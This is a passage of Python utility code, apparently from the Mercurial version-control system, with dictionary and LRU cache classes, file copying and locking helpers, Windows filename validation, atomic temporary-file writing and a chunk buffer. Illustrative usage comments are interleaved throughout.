        """call this before writes, return self or a copied new object"""
        if getattr(self, '_copied', 0):
            self._copied -= 1
            return self.__class__(self)
        return self

    def copy(self):
        """always do a cheap copy"""
        self._copied = getattr(self, '_copied', 0) + 1
        return self

class sortdict(collections.OrderedDict):
    '''a simple sorted dictionary

    >>> d1 = sortdict([(b'a', 0), (b'b', 1)])
    >>> d2 = d1.copy()
    >>> d2
    sortdict([('a', 0), ('b', 1)])
    >>> d2.update([(b'a', 2)])
    >>> list(d2.keys()) # should still be in last-set order
    ['b', 'a']
    '''

    def __setitem__(self, key, value):
        if key in self:
            del self[key]
        super(sortdict, self).__setitem__(key, value)

    if pycompat.ispypy:
        # __setitem__() isn't called as of PyPy 5.8.0
        def update(self, src):
            if isinstance(src, dict):
                src = src.iteritems()
            for k, v in src:
                self[k] = v

class cowdict(cow, dict):
    """copy-on-write dict

    Be sure to call d = d.preparewrite() before writing to d.

    >>> a = cowdict()
    >>> a is a.preparewrite()
    True
    >>> b = a.copy()
    >>> b is a
    True
    >>> c = b.copy()
    >>> c is a
    True
    >>> a = a.preparewrite()
    >>> b is a
    False
    >>> a is a.preparewrite()
    True
    >>> c = c.preparewrite()
    >>> b is c
    False
    >>> b is b.preparewrite()
    True
    """

class cowsortdict(cow, sortdict):
    """copy-on-write sortdict

    Be sure to call d = d.preparewrite() before writing to d.
    """

class transactional(object):
    """Base class for making a transactional type into a context manager."""
    __metaclass__ = abc.ABCMeta

    @abc.abstractmethod
    def close(self):
        """Successfully closes the transaction."""

    @abc.abstractmethod
    def release(self):
        """Marks the end of the transaction.

        If the transaction has not been closed, it will be aborted.
        """

    def __enter__(self):
        return self

    def __exit__(self, exc_type, exc_val, exc_tb):
        try:
            if exc_type is None:
                self.close()
        finally:
            self.release()

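# A minimal concrete transactional, for illustration only (``_rollback`` is
# a hypothetical cleanup hook):
#
#   class demotransaction(transactional):
#       def __init__(self):
#           self._closed = False
#       def close(self):
#           self._closed = True
#       def release(self):
#           if not self._closed:
#               self._rollback()
#
#   with demotransaction() as tr:
#       pass  # normal exit: close() runs first, then release()
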
@contextlib.contextmanager
def acceptintervention(tr=None):
    """A context manager that closes the transaction on InterventionRequired

    If no transaction was provided, this simply runs the body and returns.
    """
    if not tr:
        yield
        return
    try:
        yield
        tr.close()
    except error.InterventionRequired:
        tr.close()
        raise
    finally:
        tr.release()

@contextlib.contextmanager
def nullcontextmanager():
    yield

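# Illustrative usage (a sketch; ``repo`` and ``runstep`` are hypothetical):
#
#   tr = repo.transaction('demo')
#   with acceptintervention(tr):
#       runstep()  # InterventionRequired closes tr before re-raising;
#                  # any other exception leaves tr unclosed, so release()
#                  # aborts it
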
class _lrucachenode(object):
    """A node in a doubly linked list.

    Holds a reference to nodes on either side as well as a key-value
    pair for the dictionary entry.
    """
    __slots__ = (u'next', u'prev', u'key', u'value')

    def __init__(self):
        self.next = None
        self.prev = None

        self.key = _notset
        self.value = None

    def markempty(self):
        """Mark the node as emptied."""
        self.key = _notset

class lrucachedict(object):
    """Dict that caches most recent accesses and sets.

    The dict consists of an actual backing dict - indexed by original
    key - and a doubly linked circular list defining the order of entries in
    the cache.

    The head node is the newest entry in the cache. If the cache is full,
    we recycle head.prev and make it the new head. Cache accesses result in
    the node being moved to before the existing head and being marked as the
    new head node.
    """
    def __init__(self, max):
        self._cache = {}

        self._head = head = _lrucachenode()
        head.prev = head
        head.next = head
        self._size = 1
        self._capacity = max

    def __len__(self):
        return len(self._cache)

    def __contains__(self, k):
        return k in self._cache

    def __iter__(self):
        # We don't have to iterate in cache order, but why not.
        n = self._head
        for i in range(len(self._cache)):
            yield n.key
            n = n.next

    def __getitem__(self, k):
        node = self._cache[k]
        self._movetohead(node)
        return node.value

    def __setitem__(self, k, v):
        node = self._cache.get(k)
        # Replace existing value and mark as newest.
        if node is not None:
            node.value = v
            self._movetohead(node)
            return

        if self._size < self._capacity:
            node = self._addcapacity()
        else:
            # Grab the last/oldest item.
            node = self._head.prev

        # At capacity. Kill the old entry.
        if node.key is not _notset:
            del self._cache[node.key]

        node.key = k
        node.value = v
        self._cache[k] = node
        # And mark it as newest entry. No need to adjust order since it
        # is already self._head.prev.
        self._head = node

    def __delitem__(self, k):
        node = self._cache.pop(k)
        node.markempty()

        # Temporarily mark as newest item before re-adjusting head to make
        # this node the oldest item.
        self._movetohead(node)
        self._head = node.next

    # Additional dict methods.

    def get(self, k, default=None):
        try:
            return self._cache[k].value
        except KeyError:
            return default

    def clear(self):
        n = self._head
        while n.key is not _notset:
            n.markempty()
            n = n.next

        self._cache.clear()

    def copy(self):
        result = lrucachedict(self._capacity)
        n = self._head.prev
        # Iterate in oldest-to-newest order, so the copy has the right ordering
        for i in range(len(self._cache)):
            result[n.key] = n.value
            n = n.prev
        return result

    def _movetohead(self, node):
        """Mark a node as the newest, making it the new head.

        When a node is accessed, it becomes the freshest entry in the LRU
        list, which is denoted by self._head.

        Visually, let's make ``N`` the new head node (* denotes head):

            previous/oldest <-> head <-> next/next newest

            ----<->--- A* ---<->-----
            |                       |
            E <-> D <-> N <-> C <-> B

        To:

            ----<->--- N* ---<->-----
            |                       |
            E <-> D <-> C <-> B <-> A

        This requires the following moves:

           C.next = D  (node.prev.next = node.next)
           D.prev = C  (node.next.prev = node.prev)
           E.next = N  (head.prev.next = node)
           N.prev = E  (node.prev = head.prev)
           N.next = A  (node.next = head)
           A.prev = N  (head.prev = node)
        """
        head = self._head
        # C.next = D
        node.prev.next = node.next
        # D.prev = C
        node.next.prev = node.prev
        # N.prev = E
        node.prev = head.prev
        # N.next = A
        # It is tempting to do just "head" here, however if node is
        # adjacent to head, this will do bad things.
        node.next = head.prev.next
        # E.next = N
        node.next.prev = node
        # A.prev = N
        node.prev.next = node

        self._head = node

    def _addcapacity(self):
        """Add a node to the circular linked list.

        The new node is inserted before the head node.
        """
        head = self._head
        node = _lrucachenode()
        head.prev.next = node
        node.prev = head.prev
        node.next = head
        head.prev = node
        self._size += 1
        return node

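# Illustrative usage of lrucachedict (a sketch):
#
#   >>> d = lrucachedict(2)
#   >>> d['a'] = 1
#   >>> d['b'] = 2
#   >>> d['a']         # touching 'a' makes 'b' the oldest entry
#   1
#   >>> d['c'] = 3     # at capacity, so 'b' is evicted
#   >>> 'b' in d
#   False
#   >>> 'a' in d
#   True
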
def lrucachefunc(func):
    '''cache most recent results of function calls'''
    cache = {}
    order = collections.deque()
    if func.__code__.co_argcount == 1:
        def f(arg):
            if arg not in cache:
                if len(cache) > 20:
                    del cache[order.popleft()]
                cache[arg] = func(arg)
            else:
                order.remove(arg)
            order.append(arg)
            return cache[arg]
    else:
        def f(*args):
            if args not in cache:
                if len(cache) > 20:
                    del cache[order.popleft()]
                cache[args] = func(*args)
            else:
                order.remove(args)
            order.append(args)
            return cache[args]

    return f

class propertycache(object):
    def __init__(self, func):
        self.func = func
        self.name = func.__name__
    def __get__(self, obj, type=None):
        result = self.func(obj)
        self.cachevalue(obj, result)
        return result

    def cachevalue(self, obj, value):
        # __dict__ assignment required to bypass __setattr__ (eg: repoview)
        obj.__dict__[self.name] = value

def clearcachedproperty(obj, prop):
    '''clear a cached property value, if one has been set'''
    if prop in obj.__dict__:
        del obj.__dict__[prop]

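# Illustrative usage of propertycache (a sketch):
#
#   >>> class widget(object):
#   ...     @propertycache
#   ...     def expensive(self):
#   ...         print('computing')
#   ...         return 42
#   >>> w = widget()
#   >>> w.expensive
#   computing
#   42
#   >>> w.expensive  # now served from w.__dict__, no recomputation
#   42
#   >>> clearcachedproperty(w, 'expensive')
#   >>> w.expensive
#   computing
#   42
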
def increasingchunks(source, min=1024, max=65536):
    '''return no less than min bytes per chunk while data remains,
    doubling min after each chunk until it reaches max'''
    def log2(x):
        if not x:
            return 0
        i = 0
        while x:
            x >>= 1
            i += 1
        return i - 1

    buf = []
    blen = 0
    for chunk in source:
        buf.append(chunk)
        blen += len(chunk)
        if blen >= min:
            if min < max:
                min = min << 1
                nmin = 1 << log2(blen)
                if nmin > min:
                    min = nmin
                if min > max:
                    min = max
            yield ''.join(buf)
            blen = 0
            buf = []
    if buf:
        yield ''.join(buf)

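# Illustrative behavior (a sketch): chunk sizes start around ``min`` and
# grow toward ``max`` as data streams through:
#
#   >>> chunks = ['x' * 100] * 50
#   >>> [len(c) for c in increasingchunks(chunks, min=1024, max=4096)]
#   [1100, 2100, 1800]
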
def always(fn):
    return True

def never(fn):
    return False

def nogc(func):
    """disable garbage collector

    Python's garbage collector triggers a GC each time a certain number of
    container objects (the number being defined by gc.get_threshold()) are
    allocated even when marked not to be tracked by the collector. Tracking has
    no effect on when GCs are triggered, only on what objects the GC looks
    into. As a workaround, disable GC while building complex (huge)
    containers.

    This garbage collector issue has been fixed in 2.7, but it still affects
    CPython's performance.
    """
    def wrapper(*args, **kwargs):
        gcenabled = gc.isenabled()
        gc.disable()
        try:
            return func(*args, **kwargs)
        finally:
            if gcenabled:
                gc.enable()
    return wrapper

if pycompat.ispypy:
    # PyPy runs slower with gc disabled
    nogc = lambda x: x

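# Illustrative usage of nogc (a sketch): decorate a builder of large
# container graphs so the cyclic GC cannot fire mid-construction:
#
#   @nogc
#   def buildindex(entries):
#       return dict((e, [e]) for e in entries)
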
def pathto(root, n1, n2):
    '''return the relative path from one place to another.
    root should use os.sep to separate directories
    n1 should use os.sep to separate directories
    n2 should use "/" to separate directories
    returns an os.sep-separated path.

    If n1 is a relative path, it's assumed it's
    relative to root.
    n2 should always be relative to root.
    '''
    if not n1:
        return localpath(n2)
    if os.path.isabs(n1):
        if os.path.splitdrive(root)[0] != os.path.splitdrive(n1)[0]:
            return os.path.join(root, localpath(n2))
        n2 = '/'.join((pconvert(root), n2))
    a, b = splitpath(n1), n2.split('/')
    a.reverse()
    b.reverse()
    while a and b and a[-1] == b[-1]:
        a.pop()
        b.pop()
    b.reverse()
    return pycompat.ossep.join((['..'] * len(a)) + b) or '.'

# the location of data files matching the source code
if procutil.mainfrozen() and getattr(sys, 'frozen', None) != 'macosx_app':
    # executable version (py2exe) doesn't support __file__
    datapath = os.path.dirname(pycompat.sysexecutable)
else:
    datapath = os.path.dirname(pycompat.fsencode(__file__))

i18n.setdatapath(datapath)

def checksignature(func):
    '''wrap a function with code to check for calling errors'''
    def check(*args, **kwargs):
        try:
            return func(*args, **kwargs)
        except TypeError:
            if len(traceback.extract_tb(sys.exc_info()[2])) == 1:
                raise error.SignatureError
            raise

    return check

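# Illustrative usage of checksignature (a sketch):
#
#   >>> def add(a, b):
#   ...     return a + b
#   >>> checked = checksignature(add)
#   >>> try:
#   ...     checked(1)
#   ... except error.SignatureError:
#   ...     print('called with a bad signature')
#   called with a bad signature
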
# a whitelist of known filesystems where hardlink works reliably
_hardlinkfswhitelist = {
    'apfs',
    'btrfs',
    'ext2',
    'ext3',
    'ext4',
    'hfs',
    'jfs',
    'NTFS',
    'reiserfs',
    'tmpfs',
    'ufs',
    'xfs',
    'zfs',
}

def copyfile(src, dest, hardlink=False, copystat=False, checkambig=False):
    '''copy a file, preserving mode and optionally other stat info like
    atime/mtime

    checkambig argument is used with filestat, and is useful only if
    destination file is guarded by any lock (e.g. repo.lock or
    repo.wlock).

    copystat and checkambig should be exclusive.
    '''
    assert not (copystat and checkambig)
    oldstat = None
    if os.path.lexists(dest):
        if checkambig:
            oldstat = filestat.frompath(dest)
        unlink(dest)
    if hardlink:
        # Hardlinks are problematic on CIFS (issue4546), do not allow hardlinks
        # unless we are confident that dest is on a whitelisted filesystem.
        try:
            fstype = getfstype(os.path.dirname(dest))
        except OSError:
            fstype = None
        if fstype not in _hardlinkfswhitelist:
            hardlink = False
    if hardlink:
        try:
            oslink(src, dest)
            return
        except (IOError, OSError):
            pass # fall back to normal copy
    if os.path.islink(src):
        os.symlink(os.readlink(src), dest)
        # copytime is ignored for symlinks, but in general copytime isn't
        # needed for them anyway
    else:
        try:
            shutil.copyfile(src, dest)
            if copystat:
                # copystat also copies mode
                shutil.copystat(src, dest)
            else:
                shutil.copymode(src, dest)
                if oldstat and oldstat.stat:
                    newstat = filestat.frompath(dest)
                    if newstat.isambig(oldstat):
                        # stat of copied file is ambiguous to original one
                        advanced = (
                            oldstat.stat[stat.ST_MTIME] + 1) & 0x7fffffff
                        os.utime(dest, (advanced, advanced))
        except shutil.Error as inst:
            raise error.Abort(str(inst))

def copyfiles(src, dst, hardlink=None, progress=lambda t, pos: None):
    """Copy a directory tree using hardlinks if possible."""
    num = 0

    gettopic = lambda: hardlink and _('linking') or _('copying')

    if os.path.isdir(src):
        if hardlink is None:
            hardlink = (os.stat(src).st_dev ==
                        os.stat(os.path.dirname(dst)).st_dev)
        topic = gettopic()
        os.mkdir(dst)
        for name, kind in listdir(src):
            srcname = os.path.join(src, name)
            dstname = os.path.join(dst, name)
            def nprog(t, pos):
                if pos is not None:
                    return progress(t, pos + num)
            hardlink, n = copyfiles(srcname, dstname, hardlink, progress=nprog)
            num += n
    else:
        if hardlink is None:
            hardlink = (os.stat(os.path.dirname(src)).st_dev ==
                        os.stat(os.path.dirname(dst)).st_dev)
        topic = gettopic()

        if hardlink:
            try:
                oslink(src, dst)
            except (IOError, OSError):
                hardlink = False
                shutil.copy(src, dst)
        else:
            shutil.copy(src, dst)
        num += 1
        progress(topic, num)
    progress(topic, None)

    return hardlink, num

_winreservednames = {
    'con', 'prn', 'aux', 'nul',
    'com1', 'com2', 'com3', 'com4', 'com5', 'com6', 'com7', 'com8', 'com9',
    'lpt1', 'lpt2', 'lpt3', 'lpt4', 'lpt5', 'lpt6', 'lpt7', 'lpt8', 'lpt9',
}
_winreservedchars = ':*?"<>|'
def checkwinfilename(path):
    r'''Check that the base-relative path is a valid filename on Windows.
    Returns None if the path is ok, or a UI string describing the problem.

    >>> checkwinfilename(b"just/a/normal/path")
    >>> checkwinfilename(b"foo/bar/con.xml")
    "filename contains 'con', which is reserved on Windows"
    >>> checkwinfilename(b"foo/con.xml/bar")
    "filename contains 'con', which is reserved on Windows"
    >>> checkwinfilename(b"foo/bar/xml.con")
    >>> checkwinfilename(b"foo/bar/AUX/bla.txt")
    "filename contains 'AUX', which is reserved on Windows"
    >>> checkwinfilename(b"foo/bar/bla:.txt")
    "filename contains ':', which is reserved on Windows"
    >>> checkwinfilename(b"foo/bar/b\07la.txt")
    "filename contains '\\x07', which is invalid on Windows"
    >>> checkwinfilename(b"foo/bar/bla ")
    "filename ends with ' ', which is not allowed on Windows"
    >>> checkwinfilename(b"../bar")
    >>> checkwinfilename(b"foo\\")
    "filename ends with '\\', which is invalid on Windows"
    >>> checkwinfilename(b"foo\\/bar")
    "directory name ends with '\\', which is invalid on Windows"
    '''
    if path.endswith('\\'):
        return _("filename ends with '\\', which is invalid on Windows")
    if '\\/' in path:
        return _("directory name ends with '\\', which is invalid on Windows")
    for n in path.replace('\\', '/').split('/'):
        if not n:
            continue
        for c in _filenamebytestr(n):
            if c in _winreservedchars:
                return _("filename contains '%s', which is reserved "
                         "on Windows") % c
            if ord(c) <= 31:
                return _("filename contains '%s', which is invalid "
                         "on Windows") % stringutil.escapestr(c)
        base = n.split('.')[0]
        if base and base.lower() in _winreservednames:
            return _("filename contains '%s', which is reserved "
                     "on Windows") % base
        t = n[-1:]
        if t in '. ' and n not in '..':
            return _("filename ends with '%s', which is not allowed "
                     "on Windows") % t

if pycompat.iswindows:
    checkosfilename = checkwinfilename
    timer = time.clock
else:
    checkosfilename = platform.checkosfilename
    timer = time.time

if safehasattr(time, "perf_counter"):
    timer = time.perf_counter

def makelock(info, pathname):
    """Create a lock file atomically if possible

    This may leave a stale lock file if symlink isn't supported and signal
    interrupt is enabled.
    """
    try:
        return os.symlink(info, pathname)
    except OSError as why:
        if why.errno == errno.EEXIST:
            raise
    except AttributeError: # no symlink in os
        pass

    flags = os.O_CREAT | os.O_WRONLY | os.O_EXCL | getattr(os, 'O_BINARY', 0)
    ld = os.open(pathname, flags)
    os.write(ld, info)
    os.close(ld)

def readlock(pathname):
    try:
        return os.readlink(pathname)
    except OSError as why:
        if why.errno not in (errno.EINVAL, errno.ENOSYS):
            raise
    except AttributeError: # no symlink in os
        pass
    fp = posixfile(pathname, 'rb')
    r = fp.read()
    fp.close()
    return r

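# Illustrative round trip (a sketch; ``lockpath`` is a hypothetical path in
# a scratch directory):
#
#   makelock('pid:12345', lockpath)
#   assert readlock(lockpath) == 'pid:12345'
#   os.unlink(lockpath)
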
def fstat(fp):
    '''stat file object that may not have fileno method.'''
    try:
        return os.fstat(fp.fileno())
    except AttributeError:
        return os.stat(fp.name)

# File system features

def fscasesensitive(path):
    """
    Return true if the given path is on a case-sensitive filesystem

    Requires a path (like /foo/.hg) ending with a foldable final
    directory component.
    """
    s1 = os.lstat(path)
    d, b = os.path.split(path)
    b2 = b.upper()
    if b == b2:
        b2 = b.lower()
        if b == b2:
            return True # no evidence against case sensitivity
    p2 = os.path.join(d, b2)
    try:
        s2 = os.lstat(p2)
        if s2 == s1:
            return False
        return True
    except OSError:
        return True

try:
    import re2
    _re2 = None
except ImportError:
    _re2 = False

class _re(object):
    def _checkre2(self):
        global _re2
        try:
            # check if match works, see issue3964
            _re2 = bool(re2.match(r'\[([^\[]+)\]', '[ui]'))
        except ImportError:
            _re2 = False

    def compile(self, pat, flags=0):
        '''Compile a regular expression, using re2 if possible

        For best performance, use only re2-compatible regexp features. The
        only flags from the re module that are re2-compatible are
        IGNORECASE and MULTILINE.'''
        if _re2 is None:
            self._checkre2()
        if _re2 and (flags & ~(remod.IGNORECASE | remod.MULTILINE)) == 0:
            if flags & remod.IGNORECASE:
                pat = '(?i)' + pat
            if flags & remod.MULTILINE:
                pat = '(?m)' + pat
            try:
                return re2.compile(pat)
            except re2.error:
                pass
        return remod.compile(pat, flags)

    @propertycache
    def escape(self):
        '''Return the version of escape corresponding to self.compile.

        This is imperfect because whether re2 or re is used for a particular
        function depends on the flags, etc, but it's the best we can do.
        '''
        global _re2
        if _re2 is None:
            self._checkre2()
        if _re2:
            return re2.escape
        else:
            return remod.escape

re = _re()

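# Illustrative use of the ``re`` facade above (a sketch): callers get re2
# when it is available and the stdlib engine otherwise:
#
#   >>> pat = re.compile(r'ba[rz]', remod.IGNORECASE)
#   >>> bool(pat.match('BAZ'))
#   True
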
_fspathcache = {}
def fspath(name, root):
    '''Get name in the case stored in the filesystem

    The name should be relative to root, and be normcase-ed for efficiency.

    Note that this function is unnecessary, and should not be
    called, for case-sensitive filesystems (simply because it's expensive).

    The root should be normcase-ed, too.
    '''
    def _makefspathcacheentry(dir):
        return dict((normcase(n), n) for n in os.listdir(dir))

    seps = pycompat.ossep
    if pycompat.osaltsep:
        seps = seps + pycompat.osaltsep
    # Protect backslashes. This gets silly very quickly.
    seps = seps.replace('\\', '\\\\')
    pattern = remod.compile(br'([^%s]+)|([%s]+)' % (seps, seps))
    dir = os.path.normpath(root)
    result = []
    for part, sep in pattern.findall(name):
        if sep:
            result.append(sep)
            continue

        if dir not in _fspathcache:
            _fspathcache[dir] = _makefspathcacheentry(dir)
        contents = _fspathcache[dir]

        found = contents.get(part)
        if not found:
            # retry "once per directory" per "dirstate.walk" which
            # may take place for each patch of "hg qpush", for example
            _fspathcache[dir] = contents = _makefspathcacheentry(dir)
            found = contents.get(part)

        result.append(found or part)
        dir = os.path.join(dir, part)

    return ''.join(result)

def checknlink(testfile):
    '''check whether hardlink count reporting works properly'''

    # testfile may be open, so we need a separate file for checking to
    # work around issue2543 (or testfile may get lost on Samba shares)
    f1, f2, fp = None, None, None
    try:
        fd, f1 = tempfile.mkstemp(prefix='.%s-' % os.path.basename(testfile),
                                  suffix='1~', dir=os.path.dirname(testfile))
        os.close(fd)
        f2 = '%s2~' % f1[:-2]

        oslink(f1, f2)
        # nlinks() may behave differently for files on Windows shares if
        # the file is open.
        fp = posixfile(f2)
        return nlinks(f2) > 1
    except OSError:
        return False
    finally:
        if fp is not None:
            fp.close()
        for f in (f1, f2):
            try:
                if f is not None:
                    os.unlink(f)
            except OSError:
                pass

def endswithsep(path):
    '''Check path ends with os.sep or os.altsep.'''
    return (path.endswith(pycompat.ossep)
            or pycompat.osaltsep and path.endswith(pycompat.osaltsep))

def splitpath(path):
    '''Split path by os.sep.
    Note that this function does not use os.altsep because this is
    an alternative to the simple "xxx.split(os.sep)".
    It is recommended to use os.path.normpath() before using this
    function if needed.'''
    return path.split(pycompat.ossep)

def mktempcopy(name, emptyok=False, createmode=None):
    """Create a temporary file with the same contents from name

    The permission bits are copied from the original file.

    If the temporary file is going to be truncated immediately, you
    can use emptyok=True as an optimization.

    Returns the name of the temporary file.
    """
    d, fn = os.path.split(name)
    fd, temp = tempfile.mkstemp(prefix='.%s-' % fn, suffix='~', dir=d)
    os.close(fd)
    # Temporary files are created with mode 0600, which is usually not
    # what we want. If the original file already exists, just copy
    # its mode. Otherwise, manually obey umask.
    copymode(name, temp, createmode)
    if emptyok:
        return temp
    try:
        try:
            ifp = posixfile(name, "rb")
        except IOError as inst:
            if inst.errno == errno.ENOENT:
                return temp
            if not getattr(inst, 'filename', None):
                inst.filename = name
            raise
        ofp = posixfile(temp, "wb")
        for chunk in filechunkiter(ifp):
            ofp.write(chunk)
        ifp.close()
        ofp.close()
    except: # re-raises
        try:
            os.unlink(temp)
        except OSError:
            pass
        raise
    return temp

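# Illustrative usage of mktempcopy (a sketch; ``path`` names a hypothetical
# existing file):
#
#   tmp = mktempcopy(path)
#   # ... rewrite tmp in place, then swap it over the original ...
#   os.rename(tmp, path)
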
class filestat(object):
    """help to exactly detect change of a file

    'stat' attribute is result of 'os.stat()' if specified 'path'
    exists. Otherwise, it is None. This can avoid preparative
    'exists()' examination on client side of this class.
    """
    def __init__(self, stat):
        self.stat = stat

    @classmethod
    def frompath(cls, path):
        try:
            stat = os.stat(path)
        except OSError as err:
            if err.errno != errno.ENOENT:
                raise
            stat = None
        return cls(stat)

    @classmethod
    def fromfp(cls, fp):
        stat = os.fstat(fp.fileno())
        return cls(stat)

    __hash__ = object.__hash__

    def __eq__(self, old):
        try:
            # if ambiguity between stat of new and old file is
            # avoided, comparison of size, ctime and mtime is enough
            # to exactly detect change of a file regardless of platform
            return (self.stat.st_size == old.stat.st_size and
                    self.stat[stat.ST_CTIME] == old.stat[stat.ST_CTIME] and
                    self.stat[stat.ST_MTIME] == old.stat[stat.ST_MTIME])
        except AttributeError:
            pass
        try:
            return self.stat is None and old.stat is None
        except AttributeError:
            return False

    def isambig(self, old):
        """Examine whether new (= self) stat is ambiguous against old one

        "S[N]" below means stat of a file at N-th change:

        - S[n-1].ctime  < S[n].ctime: can detect change of a file
        - S[n-1].ctime == S[n].ctime
          - S[n-1].ctime  < S[n].mtime: means natural advancing (*1)
          - S[n-1].ctime == S[n].mtime: is ambiguous (*2)
          - S[n-1].ctime  > S[n].mtime: never occurs naturally (don't care)
        - S[n-1].ctime  > S[n].ctime: never occurs naturally (don't care)

        Case (*2) above means that a file was changed twice or more at
        same time in sec (= S[n-1].ctime), and comparison of timestamp
        is ambiguous.

        Base idea to avoid such ambiguity is "advance mtime 1 sec, if
        timestamp is ambiguous".

        But advancing mtime only in case (*2) doesn't work as
        expected, because naturally advanced S[n].mtime in case (*1)
        might be equal to manually advanced S[n-1 or earlier].mtime.

        Therefore, all "S[n-1].ctime == S[n].ctime" cases should be
        treated as ambiguous regardless of mtime, to avoid overlooking
        by confliction between such mtime.

        Advancing mtime "if isambig(oldstat)" ensures "S[n-1].mtime !=
        S[n].mtime", even if size of a file isn't changed.
        """
        try:
            return (self.stat[stat.ST_CTIME] == old.stat[stat.ST_CTIME])
        except AttributeError:
            return False

    def avoidambig(self, path, old):
        """Change file stat of specified path to avoid ambiguity

        'old' should be previous filestat of 'path'.

        This skips avoiding ambiguity, if a process doesn't have
2044 This skips avoiding ambiguity, if a process doesn't have
2045 appropriate privileges for 'path'. This returns False in this
2045 appropriate privileges for 'path'. This returns False in this
2046 case.
2046 case.
2047
2047
2048 Otherwise, this returns True, as "ambiguity is avoided".
2048 Otherwise, this returns True, as "ambiguity is avoided".
2049 """
2049 """
2050 advanced = (old.stat[stat.ST_MTIME] + 1) & 0x7fffffff
2050 advanced = (old.stat[stat.ST_MTIME] + 1) & 0x7fffffff
2051 try:
2051 try:
2052 os.utime(path, (advanced, advanced))
2052 os.utime(path, (advanced, advanced))
2053 except OSError as inst:
2053 except OSError as inst:
2054 if inst.errno == errno.EPERM:
2054 if inst.errno == errno.EPERM:
2055 # utime() on the file created by another user causes EPERM,
2055 # utime() on the file created by another user causes EPERM,
2056 # if a process doesn't have appropriate privileges
2056 # if a process doesn't have appropriate privileges
2057 return False
2057 return False
2058 raise
2058 raise
2059 return True
2059 return True
2060
2060
2061 def __ne__(self, other):
2061 def __ne__(self, other):
2062 return not self == other
2062 return not self == other
2063
2063
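# Illustrative usage sketch, not part of the class above: callers typically
# snapshot a filestat before rewriting a file and compare afterwards
# ('samplepath' is a hypothetical path used only for illustration):
#
#   oldstat = filestat.frompath(samplepath)
#   # ... rewrite the file at samplepath ...
#   newstat = filestat.frompath(samplepath)
#   if newstat.isambig(oldstat):
#       # same ctime as before: advance mtime to disambiguate
#       newstat.avoidambig(samplepath, oldstat)
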
class atomictempfile(object):
    '''writable file object that atomically updates a file

    All writes will go to a temporary copy of the original file. Call
    close() when you are done writing, and atomictempfile will rename
    the temporary copy to the original name, making the changes
    visible. If the object is destroyed without being closed, all your
    writes are discarded.

    The constructor's checkambig argument is used together with
    filestat, and is useful only if the target file is guarded by a
    lock (e.g. repo.lock or repo.wlock).
    '''
    def __init__(self, name, mode='w+b', createmode=None, checkambig=False):
        self.__name = name # permanent name
        self._tempname = mktempcopy(name, emptyok=('w' in mode),
                                    createmode=createmode)
        self._fp = posixfile(self._tempname, mode)
        self._checkambig = checkambig

        # delegated methods
        self.read = self._fp.read
        self.write = self._fp.write
        self.seek = self._fp.seek
        self.tell = self._fp.tell
        self.fileno = self._fp.fileno

    def close(self):
        if not self._fp.closed:
            self._fp.close()
            filename = localpath(self.__name)
            oldstat = self._checkambig and filestat.frompath(filename)
            if oldstat and oldstat.stat:
                rename(self._tempname, filename)
                newstat = filestat.frompath(filename)
                if newstat.isambig(oldstat):
                    # stat of changed file is ambiguous to original one
                    advanced = (oldstat.stat[stat.ST_MTIME] + 1) & 0x7fffffff
                    os.utime(filename, (advanced, advanced))
            else:
                rename(self._tempname, filename)

    def discard(self):
        if not self._fp.closed:
            try:
                os.unlink(self._tempname)
            except OSError:
                pass
            self._fp.close()

    def __del__(self):
        if safehasattr(self, '_fp'): # constructor actually did something
            self.discard()

    def __enter__(self):
        return self

    def __exit__(self, exctype, excvalue, traceback):
        if exctype is not None:
            self.discard()
        else:
            self.close()

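# Illustrative usage sketch, assuming a hypothetical path 'somefile':
#
#   with atomictempfile('somefile', 'wb') as fp:
#       fp.write(b'new content')
#
# On a clean exit the temporary copy is renamed over 'somefile'; if the
# block raises, the temporary copy is discarded and 'somefile' is left
# untouched.
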
def unlinkpath(f, ignoremissing=False):
    """unlink and remove the directory if it is empty"""
    if ignoremissing:
        tryunlink(f)
    else:
        unlink(f)
    # try removing directories that might now be empty
    try:
        removedirs(os.path.dirname(f))
    except OSError:
        pass

def tryunlink(f):
    """Attempt to remove a file, ignoring ENOENT errors."""
    try:
        unlink(f)
    except OSError as e:
        if e.errno != errno.ENOENT:
            raise

def makedirs(name, mode=None, notindexed=False):
    """recursive directory creation with parent mode inheritance

    Newly created directories are marked as "not to be indexed by
    the content indexing service", if ``notindexed`` is specified
    for "write" mode access.
    """
    try:
        makedir(name, notindexed)
    except OSError as err:
        if err.errno == errno.EEXIST:
            return
        if err.errno != errno.ENOENT or not name:
            raise
        parent = os.path.dirname(os.path.abspath(name))
        if parent == name:
            raise
        makedirs(parent, mode, notindexed)
        try:
            makedir(name, notindexed)
        except OSError as err:
            # Catch EEXIST to handle races
            if err.errno == errno.EEXIST:
                return
            raise
    if mode is not None:
        os.chmod(name, mode)

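# Illustrative usage sketch ('a/b/c' is a hypothetical path):
#
#   makedirs(b'a/b/c')   # creates 'a', 'a/b' and 'a/b/c' as needed
#   makedirs(b'a/b/c')   # no-op: EEXIST is swallowed, so re-runs and
#                        # concurrent creators are safe
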
def readfile(path):
    with open(path, 'rb') as fp:
        return fp.read()

def writefile(path, text):
    with open(path, 'wb') as fp:
        fp.write(text)

def appendfile(path, text):
    with open(path, 'ab') as fp:
        fp.write(text)

class chunkbuffer(object):
    """Allow arbitrary sized chunks of data to be efficiently read from an
    iterator over chunks of arbitrary size."""

    def __init__(self, in_iter):
        """in_iter is the iterator that's iterating over the input chunks."""
        def splitbig(chunks):
            for chunk in chunks:
                if len(chunk) > 2**20:
                    pos = 0
                    while pos < len(chunk):
                        end = pos + 2 ** 18
                        yield chunk[pos:end]
                        pos = end
                else:
                    yield chunk
        self.iter = splitbig(in_iter)
        self._queue = collections.deque()
        self._chunkoffset = 0

    def read(self, l=None):
        """Read L bytes of data from the iterator of chunks of data.
        Returns less than L bytes if the iterator runs dry.

        If the size parameter is omitted, read everything."""
        if l is None:
            return ''.join(self.iter)

        left = l
        buf = []
        queue = self._queue
        while left > 0:
            # refill the queue
            if not queue:
                target = 2**18
                for chunk in self.iter:
                    queue.append(chunk)
                    target -= len(chunk)
                    if target <= 0:
                        break
                if not queue:
                    break

            # The easy way to do this would be to queue.popleft(), modify the
            # chunk (if necessary), then queue.appendleft(). However, for cases
            # where we read partial chunk content, this incurs 2 dequeue
            # mutations and creates a new str for the remaining chunk in the
            # queue. Our code below avoids this overhead.

            chunk = queue[0]
            chunkl = len(chunk)
            offset = self._chunkoffset

            # Use full chunk.
            if offset == 0 and left >= chunkl:
                left -= chunkl
                queue.popleft()
                buf.append(chunk)
                # self._chunkoffset remains at 0.
                continue

            chunkremaining = chunkl - offset

            # Use all of unconsumed part of chunk.
            if left >= chunkremaining:
